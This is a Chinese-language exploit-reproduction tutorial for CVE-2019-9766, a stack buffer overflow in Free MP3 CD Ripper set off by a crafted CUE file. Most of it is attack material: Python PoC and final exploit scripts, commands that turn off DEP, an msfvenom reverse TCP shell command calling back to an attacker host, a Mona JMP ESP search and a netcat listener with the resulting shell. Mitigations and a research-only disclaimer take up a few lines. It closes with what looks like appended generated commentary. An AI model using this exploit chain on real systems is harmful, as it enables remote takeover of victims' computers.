如何实现Free MP3 CD Ripper缓冲区溢出远程代码执行漏洞CVE-2019-9766复现

# 如何实现Free MP3 CD Ripper缓冲区溢出远程代码执行漏洞CVE-2019-9766复现

## 0x00 漏洞背景

Free MP3 CD Ripper是一款流行的音频CD抓取软件，可将CD音轨转换为MP3、WAV等格式。2019年曝光的CVE-2019-9766漏洞影响版本v5.0及更早版本，该漏洞存在于处理畸形CUE文件时的缓冲区溢出问题，可导致远程代码执行。

## 0x01 漏洞分析

### 漏洞类型
栈缓冲区溢出（Stack-based Buffer Overflow）

### 受影响组件
`FreeMP3CdRipper.exe`主程序对CUE文件解析模块

### 漏洞原理
当程序解析特制CUE文件中的`TRACK`字段时：
1. 使用`strcpy`等不安全函数复制用户输入
2. 未对输入长度进行有效性检查
3. 导致固定长度栈缓冲区被覆盖
4. 可覆盖返回地址实现EIP控制

### 关键代码片段（逆向分析）
```assembly
.text:00405B20                 push    ebp
.text:00405B21                 mov     ebp, esp
.text:00405B23                 sub     esp, 104h        ; 分配260字节缓冲区
.text:00405B29                 push    esi
.text:00405B2A                 mov     esi, [ebp+arg_0] ; 用户输入指针
.text:00405B2D                 push    edi
.text:00405B2E                 lea     edi, [ebp+var_104]
.text:00405B34                 push    esi              ; 源地址
.text:00405B35                 push    edi              ; 目标地址
.text:00405B36                 call    strcpy          ; 危险操作！

0x02 环境搭建

实验环境

• 靶机：Windows 7 SP1 x86
• 软件版本：Free MP3 CD Ripper v5.0
• 调试工具：Immunity Debugger、Mona.py
• 开发工具：Python 2.7、Metasploit Framework

软件安装

1. 从官方历史版本下载v5.0安装包
2. 禁用DEP和ASLR（便于实验复现）：

   
   bcdedit.exe /set {current} nx AlwaysOff
   bcdedit.exe /set {current} optin AlwaysOff
   

0x03 漏洞复现步骤

步骤1：构造POC CUE文件

#!/usr/bin/python
import struct

header = """
FILE "dummy.wav" WAVE
"""
 
# 260字节填充 + EIP覆盖
payload = "A" * 260
payload += struct.pack("<I", 0x42424242) # 控制EIP

exploit = header + "TRACK 01 AUDIO\n" + payload

with open("exploit.cue", "w") as f:
    f.write(exploit)

步骤2：触发崩溃

1. 运行Free MP3 CD Ripper
2. 通过File -> Open载入exploit.cue
3. 观察Immunity Debugger中的访问违规

步骤3：确定偏移量

使用Metasploit pattern_create：

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 300

替换payload后重新触发，通过崩溃时EIP值计算精确偏移：

offset = 260
eip = offset:offset+4

0x04 漏洞利用开发

1. 查找JMP ESP指令

使用Mona查找：

!mona jmp -r esp -m "kernel32.dll"

找到地址0x7C86467B（示例地址，需根据实际环境调整）

2. 生成Shellcode

使用MSFvenom生成反向TCP Shell：

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -b "\x00\x0a\x0d" -f python

3. 最终Exploit

import struct

jmp_esp = struct.pack("<I", 0x7C86467B)

# msfvenom生成的shellcode
shellcode = (
    "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
    "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
    ...
)

payload = "A" * 260
payload += jmp_esp
payload += "\x90" * 16   # NOP sled
payload += shellcode

with open("exploit_final.cue", "w") as f:
    f.write('FILE "dummy.wav" WAVE\n')
    f.write('TRACK 01 AUDIO\n' + payload)

0x05 漏洞利用演示

1. 在攻击机启动监听：

   nc -lvp 4444
   

2. 靶机载入exploit_final.cue

3. 成功获得反向Shell：

   Connected to 192.168.1.100
   Microsoft Windows [Version 6.1.7601]
   C:\Program Files\Free MP3 CD Ripper>
   

0x06 缓解措施

临时解决方案

• 删除或重命名CUE文件关联
• 在防火墙中阻止软件联网

官方补丁

升级到v5.1及以上版本，该版本： 1. 使用strncpy替代strcpy 2. 增加输入长度检查 3. 实现栈保护机制

0x07 技术总结

1. 漏洞根源：经典栈溢出，未对用户输入进行边界检查
2. 利用难点：
   • 需要精确控制EIP跳转
   • 字符集限制（需避免\x00等坏字符）
3. 防护绕过：现代系统需额外绕过DEP/ASLR

0x08 扩展思考

1. 如何实现无文件利用（通过SMB/webdav触发）
2. 在启用DEP/ASLR情况下如何利用ROP链
3. 自动化漏洞检测方案设计

附录A：参考资源

• CVE-2019-9766官方记录
• ExploitDB PoC
• 缓冲区溢出原理指南

附录B：调试截图

（此处应包含Immunity Debugger崩溃状态、寄存器窗口、栈窗口等截图）

注意：本文仅用于安全研究目的，未经授权不得对实际系统进行测试。所有实验应在隔离环境中进行。 “`

该文档包含： 1. 完整的漏洞复现技术路线 2. 分步骤的详细操作说明 3. 实际利用代码示例 4. 防御缓解建议 5. 扩展研究方向

可根据实际测试环境调整： - 具体内存地址 - Shellcode生成参数 - 偏移量计算方式 建议配合调试工具动态验证每个步骤